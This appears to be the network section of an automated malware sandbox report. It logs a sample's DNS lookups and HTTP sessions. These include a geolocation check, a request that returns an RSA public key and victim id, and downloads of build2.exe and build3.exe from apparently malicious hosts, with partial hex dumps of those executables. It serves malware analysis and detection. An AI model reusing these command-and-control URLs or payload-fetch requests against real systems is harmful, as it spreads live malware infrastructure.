Nov 30, 2022 00:22:43.039336920 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.039427042 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.039542913 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.141527891 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.141567945 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.206609011 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.206706047 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.229623079 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.229655981 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.230127096 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.230202913 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.232860088 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.232872009 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.275070906 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.275228024 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.275253057 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.275291920 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:43.275312901 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.275342941 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.341859102 CET	49712	443	192.168.2.5	162.0.217.254
Nov 30, 2022 00:22:43.341918945 CET	443	49712	162.0.217.254	192.168.2.5
Nov 30, 2022 00:22:51.451435089 CET	49710	80	192.168.2.5	88.198.94.71

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:22:09.378216028 CET	61893	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:09.401011944 CET	53	61893	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:16.162992954 CET	60649	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:16.184927940 CET	53	60649	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:16.657289028 CET	51441	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:16.671861887 CET	49177	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:16.689538002 CET	53	49177	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:16.839822054 CET	53	51441	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:30.252228975 CET	49724	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:30.271348953 CET	53	49724	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:30.948734999 CET	61452	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:30.970451117 CET	53	61452	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:34.384795904 CET	65323	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:34.407268047 CET	53	65323	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:41.460248947 CET	51484	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:41.477461100 CET	53	51484	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2022 00:22:09.378216028 CET	192.168.2.5	8.8.8.8	0xe9d1	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.162992954 CET	192.168.2.5	8.8.8.8	0xa0fd	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.657289028 CET	192.168.2.5	8.8.8.8	0xf43	Standard query (0)	uaery.top	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.671861887 CET	192.168.2.5	8.8.8.8	0x31ae	Standard query (0)	fresherlights.com	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:30.252228975 CET	192.168.2.5	8.8.8.8	0xcf1c	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:30.948734999 CET	192.168.2.5	8.8.8.8	0x49a3	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:34.384795904 CET	192.168.2.5	8.8.8.8	0xcd11	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:41.460248947 CET	192.168.2.5	8.8.8.8	0x5cf6	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 30, 2022 00:22:09.401011944 CET	8.8.8.8	192.168.2.5	0xe9d1	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.184927940 CET	8.8.8.8	192.168.2.5	0xa0fd	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	46.195.100.42	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	109.102.255.230	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	190.140.74.43	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	211.53.230.67	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	37.234.251.221	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	190.147.188.50	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	195.158.3.162	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.689538002 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	fresherlights.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	116.121.62.237	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	175.119.10.231	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	37.34.248.24	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	190.117.75.91	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	201.124.230.1	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	190.219.54.242	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	181.94.48.228	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	222.236.49.124	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	123.213.233.194	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:16.839822054 CET	8.8.8.8	192.168.2.5	0xf43	No error (0)	uaery.top	195.158.3.162	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:30.271348953 CET	8.8.8.8	192.168.2.5	0xcf1c	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:30.970451117 CET	8.8.8.8	192.168.2.5	0x49a3	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:34.407268047 CET	8.8.8.8	192.168.2.5	0xcd11	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Nov 30, 2022 00:22:41.477461100 CET	8.8.8.8	192.168.2.5	0x5cf6	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

t.me

fresherlights.com

uaery.top

88.198.94.71

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49702	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49703	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49709	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49707	149.154.167.99	443	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49711	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49712	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49704	222.236.49.123	80	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:22:17.013473988 CET	106	OUT	GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: fresherlights.com
Nov 30, 2022 00:22:18.131397963 CET	107	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:17 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 562 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 34 4a 55 50 58 68 63 4f 70 39 56 5c 2f 45 39 6c 78 5a 73 45 4b 5c 5c 6e 51 65 30 4c 55 52 37 46 78 49 58 39 2b 32 57 5c 2f 58 32 6e 47 65 52 59 79 35 64 36 5c 2f 78 6b 75 54 77 49 39 4c 44 75 42 75 55 4e 59 4c 4c 70 6b 38 41 70 53 66 67 4c 37 72 72 45 33 64 4d 61 75 31 5c 5c 6e 53 79 6f 4a 46 37 32 6d 7a 64 6e 76 76 36 53 61 42 59 58 72 49 4a 4e 7a 38 47 62 50 36 7a 6a 69 6f 6f 4e 38 4d 6d 64 33 67 53 66 6d 59 58 46 41 2b 38 45 56 6a 51 37 4d 53 36 68 6a 44 6d 59 63 5c 5c 6e 67 41 55 52 6d 51 51 36 59 67 66 6c 51 38 5c 2f 65 54 33 32 2b 6a 47 71 73 75 38 48 4c 6b 33 74 58 5c 2f 65 67 72 41 32 4f 74 30 46 36 39 4b 4a 4f 4b 77 64 33 50 6d 75 59 45 46 5a 7a 6c 5a 6e 35 59 5c 5c 6e 53 57 59 5a 54 66 65 72 6a 5c 2f 76 65 38 69 33 4c 41 39 51 32 63 68 49 34 52 78 6b 67 43 72 42 59 79 63 38 71 5a 48 64 53 6c 76 6c 56 5a 57 37 58 53 34 6b 6f 5c 2f 5a 41 37 31 77 33 43 56 75 4d 4a 5c 5c 6e 45 62 45 75 58 35 4e 6b 6e 57 59 77 79 41 35 48 43 49 64 66 31 52 70 35 36 6b 4c 35 63 75 69 37 6d 66 5c 2f 50 78 34 73 70 37 42 79 77 4e 79 32 42 53 55 69 41 65 55 4f 4d 4e 64 7a 57 67 58 6a 50 5c 5c 6e 54 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 4b 36 74 65 31 59 47 50 6e 49 62 6f 34 47 63 47 4f 45 50 33 69 48 78 31 63 46 46 48 42 55 65 67 75 78 52 47 6d 33 58 53 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4JUPXhcOp9V\/E9lxZsEK\\nQe0LUR7FxIX9+2W\/X2nGeRYy5d6\/xkuTwI9LDuBuUNYLLpk8ApSfgL7rrE3dMau1\\nSyoJF72mzdnvv6SaBYXrIJNz8GbP6zjiooN8Mmd3gSfmYXFA+8EVjQ7MS6hjDmYc\\ngAURmQQ6YgflQ8\/eT32+jGqsu8HLk3tX\/egrA2Ot0F69KJOKwd3PmuYEFZzlZn5Y\\nSWYZTferj\/ve8i3LA9Q2chI4RxkgCrBYyc8qZHdSlvlVZW7XS4ko\/ZA71w3CVuMJ\\nEbEuX5NknWYwyA5HCIdf1Rp56kL5cui7mf\/Px4sp7BywNy2BSUiAeUOMNdzWgXjP\\nTwIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49705	116.121.62.237	80	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:22:17.137850046 CET	106	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: uaery.top
Nov 30, 2022 00:22:18.428991079 CET	108	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:17 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Last-Modified: Tue, 29 Nov 2022 16:00:02 GMT ETag: "40800-5ee9e14abb179" Accept-Ranges: bytes Content-Length: 264192 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 d7 f5 25 36 b6 9b 76 36 b6 9b 76 36 b6 9b 76 8b f9 0d 76 37 b6 9b 76 28 e4 0e 76 27 b6 9b 76 28 e4 18 76 5f b6 9b 76 11 70 e0 76 31 b6 9b 76 36 b6 9a 76 ae b6 9b 76 28 e4 1f 76 14 b6 9b 76 28 e4 0f 76 37 b6 9b 76 28 e4 0a 76 37 b6 9b 76 52 69 63 68 36 b6 9b 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 57 0d 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 48 06 00 00 00 00 00 97 4e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 07 00 00 04 00 00 4b 2c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 0c 01 00 50 00 00 00 00 30 07 00 90 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 09 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 01 06 00 00 20 01 00 00 ca 02 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 2f 00 00 00 30 07 00 00 30 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$r%6v6v6vv7v(v'v(v_vpv1v6vv(vv(v7v(v7vRich6vPELWaHN @`K,P0/-@4.text `.data @.rsrc/00@@
Nov 30, 2022 00:22:18.429039001 CET	110	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 01 00 50 15 01 00 00 00 00 00 7c 0f 01 00 8a 0f 01 00 a8 0f 01 00 b6 0f 01 00 d4 0f 01 00 e6 0f 01 00 f8 0f 01 00 16 10 01 00 2a 10 Data Ascii: @P\|<Rl~2Ndt(:Jhr8
Nov 30, 2022 00:22:18.725884914 CET	111	IN	Data Raw: 69 00 6b 00 75 00 72 00 61 00 74 00 75 00 64 00 75 00 20 00 6b 00 65 00 76 00 75 00 6e 00 75 00 6d 00 6f 00 6a 00 75 00 6a 00 61 00 62 00 75 00 70 00 61 00 77 00 75 00 68 00 61 00 6b 00 69 00 73 00 65 00 20 00 66 00 65 00 66 00 69 00 6d 00 61 00 Data Ascii: ikuratudu kevunumojujabupawuhakise fefimatefobesubirahomonefel sixokedugaloragalowatexanagonalefavacoxojen pasoniya zu
Nov 30, 2022 00:22:18.725986004 CET	113	IN	Data Raw: 79 00 6f 00 20 00 6e 00 75 00 78 00 75 00 67 00 75 00 77 00 69 00 6c 00 61 00 74 00 69 00 63 00 69 00 66 00 65 00 76 00 65 00 78 00 75 00 74 00 65 00 20 00 6e 00 75 00 6d 00 6f 00 64 00 6f 00 7a 00 61 00 64 00 69 00 74 00 6f 00 6b 00 75 00 70 00 Data Ascii: yo nuxuguwilaticifevexute numodozaditokupaseneviwapfesatirazepinofahasitehukuyavonuhamut cumivinicefipudenonoguwuyyofamanitefom
Nov 30, 2022 00:22:18.726057053 CET	114	IN	Data Raw: 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 63 65 2e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 Data Ascii: more than once.This indicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initialization
Nov 30, 2022 00:22:18.726106882 CET	115	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ((((( H
Nov 30, 2022 00:22:19.020948887 CET	117	IN	Data Raw: 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Nov 30, 2022 00:22:19.021039009 CET	118	IN	Data Raw: 00 00 00 00 60 e4 43 00 90 2e 40 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 ef d8 cc 99 b1 40 17 4b b8 b5 b3 ad 39 60 ca 39 60 00 00 00 43 3a 5c 72 65 6e 61 35 32 5c 62 75 76 69 63 61 64 75 Data Ascii: `C.@RSDS@K9`9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0hljmXjsfFXj3fFXjgfF3fFXjdfFXjmfFXjlfFXj.
Nov 30, 2022 00:22:19.021750927 CET	120	IN	Data Raw: 02 c9 c2 04 00 ff 25 80 12 46 00 81 05 80 12 46 00 00 00 00 00 c3 c2 04 00 55 8b ec 51 56 be 48 e8 43 00 56 c6 05 4e e8 43 00 33 c6 05 4f e8 43 00 32 c6 05 53 e8 43 00 6c c6 05 52 e8 43 00 6c c6 05 4b e8 43 00 6e c6 05 4d e8 43 00 6c c6 05 48 e8 Data Ascii: %FFUQVHCVNC3OC2SClRClKCnMClHCkLCeJCrPC.QCdICeTC@VPFSCeICiLCuNClMCaQCoUCtHCVTCcOCPVCKCtRCtJCrPC
Nov 30, 2022 00:22:19.021878004 CET	121	IN	Data Raw: 6e 81 6d e4 ca 41 d5 1d 81 6d e4 df 37 b5 60 81 45 e4 c4 c9 27 44 81 6d e4 c2 3d 25 77 81 45 e4 74 5e 82 38 81 6d e4 c9 27 ae 7f 81 6d e4 53 03 83 79 81 45 e4 a9 48 dc 22 81 45 b4 0e e7 6e 00 81 45 94 22 77 63 4c 81 45 94 07 5a 6d 2f 81 45 f8 d3 Data Ascii: nmAm7`E'Dm=%wEt^8m'mSyEH"EnE"wcLEZm/EEn%FE`mREC-mE?DHmqE8d._m\|DE6EdTmX*E1E\#mTFPE=EO$E7Jm?$Egg+m)ZSE?LmMkTm
Nov 30, 2022 00:22:19.021920919 CET	122	IN	Data Raw: 00 56 56 56 56 ff 15 04 10 40 00 81 ff 97 5c 9d 1e 7e 15 81 7d fc c8 e7 ac 00 74 0c 81 bd 50 ff ff ff ec 42 d6 0a 75 09 47 81 ff 3f 3b 2a 8e 72 c2 bf 63 a8 79 00 83 3d c4 e9 46 00 15 75 2b 56 8d 85 6c ff ff ff 50 56 56 ff 15 28 11 40 00 56 56 ff Data Ascii: VVVV@\~}tPBuG?;*rcy=Fu+VlPVV(@VV$@VVVVV @VV4@Ou=F AHG_hX@@hP@@lPV@V@VDPV@VVVV@hl@h@@h@@V@VV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49706	222.236.49.123	80	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:22:26.085731030 CET	387	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: fresherlights.com
Nov 30, 2022 00:22:27.387768030 CET	389	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:26 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT ETag: "2600-5c86757379380" Accept-Ranges: bytes Content-Length: 9728 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 